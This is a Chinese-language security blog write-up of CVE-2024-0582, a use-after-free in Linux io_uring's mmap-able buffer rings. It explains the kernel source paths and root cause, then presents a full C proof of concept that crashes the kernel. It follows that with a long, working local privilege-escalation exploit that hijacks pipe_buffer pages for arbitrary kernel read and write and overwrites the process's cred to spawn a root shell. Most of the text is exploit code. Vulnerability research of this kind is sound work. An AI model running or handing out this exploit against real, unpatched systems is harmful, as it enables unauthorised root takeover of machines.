【CVE.0x0C】CVE-2024-0582 漏洞复现及简要分析

本文最后更新于:2025年3月14日 上午

Pwn 完一结算 io_uring 得了 MVP!mmap 就是躺赢狗!

0x00. 一切开始之前

CVE-2024-0582 是一个发生在 Linux kernel 的 io_uring 这一高性能异步 IO API 中的漏洞,得益于对使用 IORING_REGISTER_PBUF_RING 注册的 ring buffer 在 mmap() 映射的情况下存在可以在释放后仍被使用的 UAF 漏洞,攻击者可以通过该漏洞攻击内核以完成本地提权;该漏洞的 CVSS 分数为 7.8 ,影响版本包括但不限于 6.4~6.6.5 ,本文我们选用 6.4 版本的内核源码进行分析

在开始之前,请先自行了解 IO_URING 相关的基础知识

等后面有更多时间了笔者再写几篇 io_uring 相关的博客,现在先🕊着:)

0x01. 漏洞分析

PBUF_RING Internal

众所周知 IO_URING 提供了下面三个新的系统调用:

  • io_uring_setup():创建 io_uring 上下文,主要是创建一个 SQ 队列与一个 CQ 队列,并指定 queue 的元素数量;该系统调用会返回一个文件描述符以供我们进行后续操作
  • io_uring_register():操作用于异步 I/O 的文件或用户缓冲区(files or user buffers),主要有注册(在内核中创建新的缓冲区)、更新(更新缓冲区内容)、注销(释放缓冲区)等操作,已经注册的缓冲区大小无法调整
  • io_uring_enter():提交新的 I/O 请求,可以选择是否等待 I/O 完成

对于 io_uring_register() ,其系统调用原型如下:

1
2
SYSCALL_DEFINE4(io_uring_register, unsigned int, fd, unsigned int, opcode,
void __user *, arg, unsigned int, nr_args)

在其核心逻辑的 __io_uring_register() 函数当中有一个大的 switch 来为不同的 opcode 调用不同的处理函数,我们主要关注于与 PBUF_RING 相关的部分

I. 注册:IORING_REGISTER_PBUF_RING

对于这个漏洞我们主要关注当 opcode == IORING_REGISTER_PBUF_RING 的情况,该 opcode 意味着注册一个环形缓冲区,其最终会调用到 io_register_pbuf_ring() 函数:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
int io_register_pbuf_ring(struct io_ring_ctx *ctx, void __user *arg)
{
struct io_uring_buf_reg reg;
struct io_buffer_list *bl, *free_bl = NULL;
int ret;

if (copy_from_user(&reg, arg, sizeof(reg)))
return -EFAULT;

if (reg.resv[0] || reg.resv[1] || reg.resv[2])
return -EINVAL;
if (reg.flags & ~IOU_PBUF_RING_MMAP)
return -EINVAL;
if (!(reg.flags & IOU_PBUF_RING_MMAP)) {
if (!reg.ring_addr)
return -EFAULT;
if (reg.ring_addr & ~PAGE_MASK)
return -EINVAL;
} else {
if (reg.ring_addr)
return -EINVAL;
}

if (!is_power_of_2(reg.ring_entries))
return -EINVAL;

/* cannot disambiguate full vs empty due to head/tail size */
if (reg.ring_entries >= 65536)
return -EINVAL;

if (unlikely(reg.bgid < BGID_ARRAY && !ctx->io_bl)) {
int ret = io_init_bl_list(ctx);
if (ret)
return ret;
}

bl = io_buffer_get_list(ctx, reg.bgid);
if (bl) {
/* if mapped buffer ring OR classic exists, don't allow */
if (bl->is_mapped || !list_empty(&bl->buf_list))
return -EEXIST;
} else {
free_bl = bl = kzalloc(sizeof(*bl), GFP_KERNEL);
if (!bl)
return -ENOMEM;
}

if (!(reg.flags & IOU_PBUF_RING_MMAP))
ret = io_pin_pbuf_ring(&reg, bl);
else
ret = io_alloc_pbuf_ring(&reg, bl);

if (!ret) {
bl->nr_entries = reg.ring_entries;
bl->mask = reg.ring_entries - 1;

io_buffer_add_list(ctx, bl, reg.bgid);
return 0;
}

kfree(free_bl);
return ret;
}

略过各种参数检查等,我们主要关注其核心逻辑:

  • 首先调用 io_buffer_get_list() 获取已经存在的 io_buffer_list 结构体,如果不存在则分配
  • 如果请求中带有 IOU_PBUF_RING_MMAP 标志位,调用 io_alloc_pbuf_ring() 由内核分配连续页面,否则调用 io_pin_pbuf_ring() 将来自用户态的页面 pin 到 ring 上
  • 完成后将结果写入前面分配的 io_buffer_list 结构体中记录,并将该 io_buffer_list 放到当前的上下文中

这里的子标志位主要用来指示 ring buffer 的分配者,若设置了 IOU_PBUF_RING_MMAP 意味着由内核分配环形缓冲区的内存,之后用户态应用使用 mmap() 映射以访问:

1
2
3
4
5
6
7
8
9
10
11
12
13
/*
* Flags for IORING_REGISTER_PBUF_RING.
*
* IOU_PBUF_RING_MMAP: If set, kernel will allocate the memory for the ring.
* The application must not set a ring_addr in struct
* io_uring_buf_reg, instead it must subsequently call
* mmap(2) with the offset set as:
* IORING_OFF_PBUF_RING | (bgid << IORING_OFF_PBUF_SHIFT)
* to get a virtual mapping for the ring.
*/
enum {
IOU_PBUF_RING_MMAP = 1,
};

若未设置该标志位,则意味着由用户态程序提供对应的页面,此时内核会调用 io_pin_pages() 并最终调用 pin_user_pages() 完成这一操作

因为我们的漏洞出现在和 mmap() 相关的路径上,因此我们主要关注调用 io_alloc_pbuf_ring() 这一路径,该最终会调用 __get_free_pages() 分配空闲页面:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
static int io_alloc_pbuf_ring(struct io_uring_buf_reg *reg,
struct io_buffer_list *bl)
{
gfp_t gfp = GFP_KERNEL_ACCOUNT | __GFP_ZERO | __GFP_NOWARN | __GFP_COMP;
size_t ring_size;
void *ptr;

ring_size = reg->ring_entries * sizeof(struct io_uring_buf_ring);
ptr = (void *) __get_free_pages(gfp, get_order(ring_size));
if (!ptr)
return -ENOMEM;

bl->buf_ring = ptr;
bl->is_mapped = 1;
bl->is_mmap = 1;
return 0;
}

分配的结构大概长这个样子:

II. 注销:IORING_UNREGISTER_PBUF_RING

有注册就有注销,有内存分配就有内存释放,注销 PBUF_RING 对应的 opcode 为 IORING_UNREGISTER_PBUF_RING ,内核会调用到 io_unregister_pbuf_ring() 进行处理:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
int io_unregister_pbuf_ring(struct io_ring_ctx *ctx, void __user *arg)
{
struct io_uring_buf_reg reg;
struct io_buffer_list *bl;

if (copy_from_user(&reg, arg, sizeof(reg)))
return -EFAULT;
if (reg.resv[0] || reg.resv[1] || reg.resv[2])
return -EINVAL;
if (reg.flags)
return -EINVAL;

bl = io_buffer_get_list(ctx, reg.bgid);
if (!bl)
return -ENOENT;
if (!bl->is_mapped)
return -EINVAL;

__io_remove_buffers(ctx, bl, -1U);
if (bl->bgid >= BGID_ARRAY) {
xa_erase(&ctx->io_bl_xa, bl->bgid);
kfree(bl);
}
return 0;
}

不难看出其核心逻辑为:

  • 首先调用 io_buffer_get_list() 获取已经存在的 io_buffer_list 结构体,如果不存在则返回
  • 接下来调用 __io_remove_buffers() 释放 io_buffer_list 当中的页面
  • 最后调用 xa_erase() 从上下文中移除该 io_buffer_list 并释放

在看 __io_remove_buffers() 之前,我们首先回去看 io_alloc_pbuf_ring() ,注意到 io_buffer_list 这些成员的赋值:

1
2
3
4
5
6
static int io_alloc_pbuf_ring(struct io_uring_buf_reg *reg,
struct io_buffer_list *bl)
{
/* ... */
bl->is_mapped = 1;
bl->is_mmap = 1;

因此在 __io_remove_buffers() 当中,我们会进入下面的路径将前面分配的页面释放掉:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
static int __io_remove_buffers(struct io_ring_ctx *ctx,
struct io_buffer_list *bl, unsigned nbufs)
{
unsigned i = 0;

/* shouldn't happen */
if (!nbufs)
return 0;

if (bl->is_mapped) {
i = bl->buf_ring->tail - bl->head;
if (bl->is_mmap) {
struct page *page;

page = virt_to_head_page(bl->buf_ring);
if (put_page_testzero(page))
free_compound_page(page);
bl->buf_ring = NULL;
bl->is_mmap = 0;
} /* ... */
}

在后面的版本中释放页面的逻辑会从使用 put_page_testzero() 换成 folio_put(virt_to_folio(bl->buf_ring)); ,因此在修复该漏洞的 commit 当中你看到的是去除掉了 folio_put() 函数,但本质上的逻辑是一样的

III. 使用:io_uring_mmap

我们如何从用户空间访问 io_alloc_pbuf_ring() 分配的内存?内核通过 mmap() 为我们提供了一个方便快捷的途径,当我们对一个 io_uring 的 fd 使用 mmap() 进行映射时,内核最终会调用到 io_uring_mmap() 函数:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
static __cold int io_uring_mmap(struct file *file, struct vm_area_struct *vma)
{
size_t sz = vma->vm_end - vma->vm_start;
unsigned long pfn;
void *ptr;

ptr = io_uring_validate_mmap_request(file, vma->vm_pgoff, sz);
if (IS_ERR(ptr))
return PTR_ERR(ptr);

pfn = virt_to_phys(ptr) >> PAGE_SHIFT;
return remap_pfn_range(vma, vma->vm_start, pfn, sz, vma->vm_page_prot);
}

//...

static const struct file_operations io_uring_fops = {
.release = io_uring_release,
.mmap = io_uring_mmap,

io_uring_validate_mmap_request() 函数中首先会根据 mmap()offset 参数判断具体操作,这里我们也可以看出对于 io_uring 而言 mmap() 的最后一个参数并非传统的用来表示偏移值,而是使用高位数据作为 mask 表示不同类型,低位存储具体数据,这里我们主要关注和 PBUF_RING 相关的分支:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
static void *io_uring_validate_mmap_request(struct file *file,
loff_t pgoff, size_t sz)
{
struct io_ring_ctx *ctx = file->private_data;
loff_t offset = pgoff << PAGE_SHIFT;
struct page *page;
void *ptr;

/* Don't allow mmap if the ring was setup without it */
if (ctx->flags & IORING_SETUP_NO_MMAP)
return ERR_PTR(-EINVAL);

switch (offset & IORING_OFF_MMAP_MASK) {
case IORING_OFF_SQ_RING:
case IORING_OFF_CQ_RING:
ptr = ctx->rings;
break;
case IORING_OFF_SQES:
ptr = ctx->sq_sqes;
break;
case IORING_OFF_PBUF_RING: {
unsigned int bgid;

bgid = (offset & ~IORING_OFF_MMAP_MASK) >> IORING_OFF_PBUF_SHIFT;
mutex_lock(&ctx->uring_lock);
ptr = io_pbuf_get_address(ctx, bgid);
mutex_unlock(&ctx->uring_lock);
if (!ptr)
return ERR_PTR(-EINVAL);
break;
}
default:
return ERR_PTR(-EINVAL);
}

page = virt_to_head_page(ptr);
if (sz > page_size(page))
return ERR_PTR(-EINVAL);

return ptr;
}

io_pbuf_get_address 的逻辑就简单很多,主要就是取出我们前面分配的 buf_ring

1
2
3
4
5
6
7
8
9
10
void *io_pbuf_get_address(struct io_ring_ctx *ctx, unsigned long bgid)
{
struct io_buffer_list *bl;

bl = io_buffer_get_list(ctx, bgid);
if (!bl || !bl->is_mmap)
return NULL;

return bl->buf_ring;
}

Root Cause

我们其实不难看出漏洞出现在对内存所有权的严格管控,当我们将 bl->buf_ring 的内存通过 mmap() 映射出去之后, 居然仍旧能够直接通过 io_unregister_pbuf_ring 函数将这块内存给释放掉 ,由此我们先进行内存分配、再进行 mmap() 、最后再释放这块内存就直接有一个 UAF 了: 我们可以通过 mmap() 的内存区域直接读写释放掉的内内存页

Proof-Of-Concept

这里笔者给出自己写的 POC,主要就是利用 UAF 漏洞在 seq_file::seq_operations 里瞎写一通造成 kernel panic:

为什么用 liburing 而不是自己手搓 raw syscall?因为👴还没那么闲得慌

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <unistd.h>
#include <fcntl.h>
#include <string.h>
#include <sched.h>
#include <liburing.h>
#include <sys/mman.h>
#include <sys/user.h>

#ifndef IS_ERR
#define IS_ERR(ptr) ((uintptr_t) ptr >= (uintptr_t) -4095UL)
#endif

#ifndef PTR_ERR
#define PTR_ERR(ptr) ((int) (intptr_t) ptr)
#endif

#define SUCCESSS_MSG(msg) "\033[32m\033[1m" msg "\033[0m"
#define INFO_MSG(msg) "\033[34m\033[1m" msg "\033[0m"
#define ERR_MSG(msg) "\033[31m\033[1m" msg "\033[0m"

void bind_core(int core)
{
cpu_set_t cpu_set;

CPU_ZERO(&cpu_set);
CPU_SET(core, &cpu_set);
sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);

printf(INFO_MSG("[*] Process binded to core: ") "%d\n", core);
}

struct io_uring_buf_ring*
setup_pbuf_ring_mmap(struct io_uring *ring, unsigned int ring_entries,
int bgid, unsigned int flags, int *retp)
{
struct io_uring_buf_ring *buf_ring;
struct io_uring_buf_reg buf_reg;
size_t ring_size;
off_t offset;
int ret;

memset(&buf_reg, 0, sizeof(buf_reg));

/* we don't need to set reg.addr for IOU_PBUF_RING_MMAP */
buf_reg.ring_entries = ring_entries;
buf_reg.bgid = bgid;
buf_reg.flags = IOU_PBUF_RING_MMAP;

ret = io_uring_register_buf_ring(ring, &buf_reg, flags);
if (ret) {
puts(ERR_MSG("[x] Error occur while doing io_uring_register_buf_ring"));
*retp = ret;
return NULL;
}

/**
[chr(int(i,16))for i in['3361626e74747261'[i:i+2]for i in range(0,16,2)]][::-1]
**/
offset = IORING_OFF_PBUF_RING | (uint64_t) bgid << IORING_OFF_PBUF_SHIFT;
ring_size = ring_entries * sizeof(struct io_uring_buf);
buf_ring = mmap(
NULL,
ring_size,
PROT_READ | PROT_WRITE, MAP_SHARED | MAP_POPULATE,
ring->ring_fd,
offset
);

if (IS_ERR(buf_ring)) {
puts(ERR_MSG("[x] Error occur while doing mmap() for io_uring"));
*retp = PTR_ERR(buf_ring);
return NULL;
}

*retp = 0;
return buf_ring;
}

#define NR_PAGES 1
#define NR_BUFFERS 0x100
#define SEQ_FILE_NR 0x200

void proof_of_concept(void)
{
struct io_uring ring;
void **buffers;
int seq_fd[SEQ_FILE_NR], found = 0;
int ret;

puts(SUCCESSS_MSG("-------- CVE-2024-0582 Proof-of-concet --------"));
puts(INFO_MSG("-------\t\t Author: ") "arttnba3" INFO_MSG(" \t-------"));
puts(SUCCESSS_MSG("-----------------------------------------------\n"));

puts("[*] Preparing...");

bind_core(0);

if (io_uring_queue_init(4, &ring, 0) < 0) {
perror(ERR_MSG("[x] Unable to init for io_uring queue"));
exit(EXIT_FAILURE);
}

puts("[*] Allocating pbuf ring and doing mmap()...");

buffers = calloc(NR_BUFFERS, sizeof(void*));
for (int i = 0; i < NR_BUFFERS; i++) {
buffers[i] = setup_pbuf_ring_mmap(
&ring,
NR_PAGES * PAGE_SIZE / sizeof(struct io_uring_buf),
i,
0,
&ret
);
if (ret) {
printf(
ERR_MSG("[x] Unable to set up") " No.%d "
ERR_MSG("pbuf ring, error code: ") "%d\n",
i,
ret
);
exit(EXIT_FAILURE);
}

io_uring_buf_ring_init(buffers[i]);
}

puts("[*] Triggering page-level UAF vulnerabilities...");

for (int i = 0; i < NR_BUFFERS; i++) {
ret = io_uring_unregister_buf_ring(&ring, i);
if (ret) {
printf(
ERR_MSG("[x] Unable to unregister") " No.%d "
ERR_MSG("pbuf ring, error code: ") "%d\n",
i,
ret
);
exit(EXIT_FAILURE);
}
}

puts("[*] Reallocating page into seq_file::seq_operations...");

for (int i = 0; i < SEQ_FILE_NR; i++) {
if ((seq_fd[i] = open("/proc/self/stat", O_RDONLY)) < 0) {
printf(
ERR_MSG("[x] Unable to open") " No.%d "
ERR_MSG("seq file, error code: ") "%d\n",
i,
seq_fd[i]
);
exit(EXIT_FAILURE);
}
}

puts("[*] Checking data leak and overwriting...");

for (int i = 0; i < NR_BUFFERS; i++) {
uint64_t *buffer = buffers[i];
for (int j = 0; j < (NR_PAGES * PAGE_SIZE / sizeof(uint64_t)); j++) {
if (buffer[j]>0xffffffff80000000 && buffer[j]<0xfffffffff0000000) {
printf(
SUCCESSS_MSG("[+] Got kernel data leak:") " %lx "
SUCCESSS_MSG("at location ") "%d-%d\n",
buffer[j],
i,
j
);
buffer[j] = *(uint64_t*) "arttnba3";
found = 1;
goto out;
}
}
}

if (!found) {
puts(ERR_MSG("[x] Failed to reallocate UAF page as seq_operations!"));
exit(EXIT_FAILURE);
}

out:
puts("[*] Triggering kernel panic...");

sleep(1);

for (int i = 0; i < SEQ_FILE_NR; i++) {
char buf[0x1000];
read(seq_fd[i], buf, 1);
}

puts("[?] So you're still alive here!?");
system("/bin/sh");
}

int main(int argc, char **argv, char **envp)
{
proof_of_concept();
return 0;
}

运行,成功造成 kernel panic:

0x02. 漏洞利用

这个 UAF 可谓是相当的白给,其来自于非常常见的分配 page 的 API,并且可以在用户空间直接读写 UAF page,所以利用方式基本上可以说是多种多样的, 可谓是想怎么利用就怎么利用,而且还特别稳定

这里笔者直接用 page-level UAF 通过改写 pipe_buffer::page 的方式获取内核空间任意读写的权能,之后直接改写当前进程的 cred 结构体完成提权:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <stdarg.h>
#include <unistd.h>
#include <fcntl.h>
#include <string.h>
#include <sched.h>
#include <liburing.h>
#include <sys/mman.h>
#include <sys/user.h>
#include <sys/prctl.h>

#ifndef IS_ERR
#define IS_ERR(ptr) ((uintptr_t) ptr >= (uintptr_t) -4095UL)
#endif

#ifndef PTR_ERR
#define PTR_ERR(ptr) ((int) (intptr_t) ptr)
#endif

#define SUCCESS_MSG(msg) "\033[32m\033[1m" msg "\033[0m"
#define INFO_MSG(msg) "\033[34m\033[1m" msg "\033[0m"
#define ERR_MSG(msg) "\033[31m\033[1m" msg "\033[0m"

#define KASLR_GRANULARITY 0x10000000
#define KASLR_MASK (~(KASLR_GRANULARITY - 1))
uint64_t kernel_base, vmemmap_base, page_offset_base;

void bind_core(int core)
{
cpu_set_t cpu_set;

CPU_ZERO(&cpu_set);
CPU_SET(core, &cpu_set);
sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);

printf(INFO_MSG("[*] Process binded to core: ") "%d\n", core);
}

void err_exit(const char *fmt, ...)
{
va_list args;
int ret;

va_start(args, fmt);
printf(fmt, args);
va_end(args);

fflush(stdout);
fflush(stderr);

sleep(5);

exit(EXIT_FAILURE);
}

void get_root_shell(void)
{
if(getuid()) {
puts(ERR_MSG("[x] Failed to get the root!"));
sleep(5);
exit(EXIT_FAILURE);
}

puts(SUCCESS_MSG("[+] Successful to get the root."));
puts(INFO_MSG("[*] Execve root shell now..."));

system("/bin/sh");

/* to exit the process normally, instead of potential segmentation fault */
exit(EXIT_SUCCESS);
}

struct io_uring_buf_ring*
setup_pbuf_ring_mmap(struct io_uring *ring, unsigned int ring_entries,
int bgid, unsigned int flags, int *retp)
{
struct io_uring_buf_ring *buf_ring;
struct io_uring_buf_reg buf_reg;
size_t ring_size;
off_t offset;
int ret;

memset(&buf_reg, 0, sizeof(buf_reg));

/* we don't need to set reg.addr for IOU_PBUF_RING_MMAP */
buf_reg.ring_entries = ring_entries;
buf_reg.bgid = bgid;
buf_reg.flags = IOU_PBUF_RING_MMAP;

ret = io_uring_register_buf_ring(ring, &buf_reg, flags);
if (ret) {
puts(ERR_MSG("[x] Error occur while doing io_uring_register_buf_ring"));
*retp = ret;
return NULL;
}

/**
[chr(int(i,16))for i in['3361626e74747261'[i:i+2]for i in range(0,16,2)]][::-1]
**/
offset = IORING_OFF_PBUF_RING | (uint64_t) bgid << IORING_OFF_PBUF_SHIFT;
ring_size = ring_entries * sizeof(struct io_uring_buf);
buf_ring = mmap(
NULL,
ring_size,
PROT_READ | PROT_WRITE, MAP_SHARED | MAP_POPULATE,
ring->ring_fd,
offset
);

if (IS_ERR(buf_ring)) {
puts(ERR_MSG("[x] Error occur while doing mmap() for io_uring"));
*retp = PTR_ERR(buf_ring);
return NULL;
}

*retp = 0;
return buf_ring;
}

/**
* In my test environment, kmalloc-1k allocates from 4-page slub, so I chose 4.
* However, it might not be the same in your environment, e.g., it's 8 on my PC.
* Check your /proc/slabinfo before doing the exploitation.
*/
#define NR_PAGES 4
#define NR_BUFFERS 0x200
#define SEQ_FILE_NR 0x200
#define PIPE_SPRAY_NR 0x1F0

struct pipe_buffer {
struct page *page;
unsigned int offset, len;
const struct pipe_buf_operations *ops;
unsigned int flags;
unsigned long private;
};

struct cred {
long usage;
uint32_t uid;
uint32_t gid;
uint32_t suid;
uint32_t sgid;
uint32_t euid;
uint32_t egid;
uint32_t fsuid;
uint32_t fsgid;
};

void read_kernel_page_by_pipe(struct page*page,struct pipe_buffer*kern_pipe_buf,
int pipe_fd[2], void *buf, size_t len)
{
kern_pipe_buf->page = page;
kern_pipe_buf->offset = 0;
kern_pipe_buf->len = 0xffe;

if (read(pipe_fd[0], buf, len) != len) {
perror(ERR_MSG("[x] Unable to do reading on pipe"));
exit(EXIT_FAILURE);
}
}

void write_kernel_page_by_pipe(struct page *page,
struct pipe_buffer*kern_pipe_buf,
int pipe_fd[2], void *buf, size_t len)
{
kern_pipe_buf->page = page;
kern_pipe_buf->offset = 0;
kern_pipe_buf->len = 0;

if (write(pipe_fd[1], buf, len) != len) {
perror(ERR_MSG("[x] Unable to do writing on pipe"));
exit(EXIT_FAILURE);
}
}

void exploit(void)
{
struct io_uring ring;
void **buffers;
struct pipe_buffer *kern_pipe_buffer = NULL;
uint64_t kernel_leak;
int pipe_fd[PIPE_SPRAY_NR][2], victim_idx = -1;
uint32_t uid, gid;
uint64_t cred_kaddr, cred_kpage_addr;
struct cred *cred_data;
char buf[0x1000];
int ret;

puts(SUCCESS_MSG("-------- CVE-2024-0582 Exploitation --------") "\n"
INFO_MSG("-------- Author: ")"arttnba3"INFO_MSG(" --------") "\n"
SUCCESS_MSG("-------- Local Privilege Escalation --------\n"));

bind_core(0);

puts("[*] Initializing io_uring ...");

if (io_uring_queue_init(4, &ring, 0) < 0) {
perror(ERR_MSG("[x] Unable to init for io_uring queue"));
exit(EXIT_FAILURE);
}

puts("[*] Allocating pbuf ring and doing mmap() ...");

buffers = calloc(NR_BUFFERS, sizeof(void*));
for (int i = 0; i < NR_BUFFERS; i++) {
buffers[i] = setup_pbuf_ring_mmap(
&ring,
NR_PAGES * PAGE_SIZE / sizeof(struct io_uring_buf),
i,
0,
&ret
);
if (ret) {
printf(
ERR_MSG("[x] Unable to set up") " No.%d "
ERR_MSG("pbuf ring, error code: ") "%d\n",
i,
ret
);
exit(EXIT_FAILURE);
}

io_uring_buf_ring_init(buffers[i]);
}

puts("[*] Triggering page-level UAF vulnerabilities ...");

for (int i = 0; i < NR_BUFFERS; i += 2) { /* we neeed "holes" */
ret = io_uring_unregister_buf_ring(&ring, i);
if (ret) {
printf(
ERR_MSG("[x] Unable to unregister") " No.%d "
ERR_MSG("pbuf ring, error code: ") "%d\n",
i,
ret
);
exit(EXIT_FAILURE);
}
}

puts("[*] Reallocating pages as pipe_buffers ...");

for (int i = 0; i < PIPE_SPRAY_NR; i++) {
if ((ret = pipe(pipe_fd[i])) < 0) {
printf(
ERR_MSG("[x] Unable to set up") " No.%d "
ERR_MSG("pipe, error code: ") "%d\n",
i,
ret
);
exit(EXIT_FAILURE);
}
}

puts("[*] Allocating pipe_buffer::page ...");

for (int i = 0; i < PIPE_SPRAY_NR; i++) {
write(pipe_fd[i][1], "arttnba3", 8);
write(pipe_fd[i][1], "arttnba3", 8);
write(pipe_fd[i][1], "arttnba3", 8);
write(pipe_fd[i][1], "arttnba3", 8);
}

puts("[*] Checking for UAF mmap address ...");

for (int i = 0; i < NR_BUFFERS; i += 2) {
uint64_t *buffer = buffers[i];
for (int j = 0; j < (NR_PAGES * PAGE_SIZE / sizeof(uint64_t)); j++) {
if (buffer[j] > 0xffff000000000000
&& buffer[j + 1] == 0x2000000000
&& buffer[j + 2] > 0xffffffff81000000) {
printf(
SUCCESS_MSG("[+] Got kernel pipe_buffer mapped at buffer:")
" %d-%d\n", i, j
);
printf(
INFO_MSG("[*] Leak pipe_buffer::page = ")"%lx\n", buffer[j]
);
printf(
INFO_MSG("[*] Leak pipe_buffer::ops = ")"%lx\n", buffer[j+2]
);
kern_pipe_buffer = (void*) &buffer[j];
goto out_find_pipe;
}
}
}

if (!kern_pipe_buffer) {
puts(ERR_MSG("[x] Failed to find kernel pipe_buffer in user space!"));
exit(EXIT_FAILURE);
}

out_find_pipe:

puts("[*] Overwriting victim pipe_buffer::page ...");
/* note that the granularity of KASLR is 256MB, i.e. 0x10000000*/
vmemmap_base = (uint64_t) kern_pipe_buffer->page & KASLR_MASK;
kern_pipe_buffer->page = (void*) (vmemmap_base + 0x9d000 / 0x1000 * 0x40);

for (int i = 0; i < PIPE_SPRAY_NR; i++) {
read(pipe_fd[i][0], &kernel_leak, sizeof(kernel_leak));
if (kernel_leak != *(uint64_t*) "arttnba3") {
printf(SUCCESS_MSG("[+] Got victim pipe at idx: ") "%d\n", i);
victim_idx = i;
break;
}
}

if (victim_idx == -1) {
puts(ERR_MSG("[x] Failed to find the victim pipe!"));
exit(EXIT_FAILURE);
}

for (uint64_t loop_nr = 0; 1; loop_nr++) {
if (kernel_leak > 0xffffffff81000000
&& (kernel_leak & 0xfff) < 0x100) {
kernel_base = kernel_leak & 0xfffffffffffff000;
if (loop_nr != 0) {
puts("");
}
printf(
INFO_MSG("[*] Leak secondary_startup_64 : ") "%lx\n",kernel_leak
);
printf(SUCCESS_MSG("[+] Got kernel base: ") "%lx\n", kernel_base);
printf(SUCCESS_MSG("[+] Got vmemmap_base: ") "%lx\n", vmemmap_base);
break;
}

for (int i = 0; i < 80; i++) {
putchar('\b');
}
printf(
"[No.%ld loop] Got unmatched data: %lx, keep looping...",
loop_nr,
kernel_leak
);

vmemmap_base -= KASLR_GRANULARITY;
read_kernel_page_by_pipe(
(void*) (vmemmap_base + 0x9d000 / 0x1000 * 0x40),
kern_pipe_buffer,
pipe_fd[victim_idx],
&kernel_leak,
sizeof(kernel_leak)
);
}

puts("[*] Finding task_struct of current process in kernel space ...");

prctl(PR_SET_NAME, "rat3bant");
uid = getuid();
gid = getgid();

for (int i = 0; 1; i++) {
uint64_t *comm_addr;

read_kernel_page_by_pipe(
(void*) (vmemmap_base + 0x40 * i),
kern_pipe_buffer,
pipe_fd[victim_idx],
buf,
0xff8
);

comm_addr = memmem(buf, 0xff0, "rat3bant", 8);

if (comm_addr && (comm_addr[-2] > 0xffff888000000000) /* task->cred */
&& (comm_addr[-3] > 0xffff888000000000) /* task->real_cred */
&& (comm_addr[-2] == comm_addr[-3])) { /* should be equal */

printf(
SUCCESS_MSG("[+] Found task_struct on page: ") "%lx\n",
(vmemmap_base + i * 0x40)
);
printf(SUCCESS_MSG("[+] Got cred address: ") "%lx\n",comm_addr[-2]);

cred_kaddr = comm_addr[-2];
cred_data = (void*) (buf + (cred_kaddr & (PAGE_SIZE - 1)));
page_offset_base = cred_kaddr & KASLR_MASK;

while (1) {
cred_kpage_addr = vmemmap_base + \
(cred_kaddr - page_offset_base) / 0x1000 * 0x40;

read_kernel_page_by_pipe(
(void*) cred_kpage_addr,
kern_pipe_buffer,
pipe_fd[victim_idx],
buf,
0xffe
);
if (cred_data->uid == uid
&& cred_data->gid == gid) {
printf(
SUCCESS_MSG("[+] Found cred on page: ") "%lx\n",
cred_kpage_addr
);
break;
}

page_offset_base -= KASLR_GRANULARITY;
}

break;
}
}

puts("[*] Overwriting cred and granting root privilege...");

cred_data->uid = 0;
cred_data->gid = 0;

write_kernel_page_by_pipe(
(void*) cred_kpage_addr,
kern_pipe_buffer,
pipe_fd[victim_idx],
buf,
0xff0
);

setresuid(0, 0, 0);
setresgid(0, 0, 0);

